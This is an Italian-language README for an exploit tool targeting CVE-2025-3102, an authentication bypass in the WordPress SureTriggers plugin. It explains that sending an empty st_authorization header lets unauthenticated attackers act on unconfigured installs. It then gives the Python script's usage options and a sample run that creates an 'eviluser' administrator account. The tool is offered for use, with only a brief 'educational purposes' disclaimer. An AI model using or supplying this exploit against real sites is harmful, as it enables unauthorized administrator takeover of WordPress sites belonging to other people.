
Wordpress SureTriggers <= 1.0.78 - Bypass dell'autorizzazione dovuto alla mancata verifica dei valori vuoti che consente la creazione non autenticata di utenti amministrativi
🚨 CVE-2025-3102 è una vulnerabilità critica di bypass dell'autenticazione che colpisce il plugin WordPress SureTriggers: All-in-One Automation Platform, installato attivamente su oltre 100.000 siti web. Data la natura del difetto e la portata della distribuzione, questa vulnerabilità rappresenta un rischio significativo per la sicurezza.
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:HIl plugin SureTriggers per WordPress è vulnerabile a un bypass dell'autenticazione che consente a utenti non autenticati di creare account amministratore. Ciò è dovuto a una mancata verifica dei valori vuoti su secret_key all'interno della funzione autheticate_user.
Quando il plugin è installato e attivato ma non configurato con una chiave API, gli aggressori possono bypassare l'autenticazione inviando un header st_authorization vuoto, attivando azioni riservate agli utenti autenticati.
Viene fornito uno script Python per automatizzare lo sfruttamento di questa vulnerabilità.
Questo script consente di generare un nuovo utente amministratore su siti vulnerabili.
readme.txtst_authorization vuotousage: CVE-2025-3102.py [-h] -u URL [-nmail NEWMAIL] [-nu NEWUSER] [-np NEWPASSWORD]
SureTriggers <= 1.0.78 - Authorization Bypass Exploit
By: rHz0d
options:
-h, --help Show this help message and exit
-u, --url URL Target WordPress base URL
-nmail, --newmail NEWMAIL Email to register
-nu, --newuser NEWUSER Username to register
-np, --newpassword NEWPASSWORD Password for the new user
[+] Detected plugin version: 1.0.78
[+] Vulnerable version detected. Proceeding...
[*] Exploiting the target in 3 seconds...
[+] Email generated: [email protected]
[+] Username generated: eviluser
[+] Password generated: P@ssw0rd123!
[+] Exploit Successful!
[+] Login credentials: eviluser:P@ssw0rd123!
Questo script è fornito solo a scopo educativo.
L'uso non autorizzato di questo codice contro obiettivi senza permesso esplicito è illegale.
L'autore non si assume alcuna responsabilità per eventuali usi impropri o danni causati.
Di: rHz0d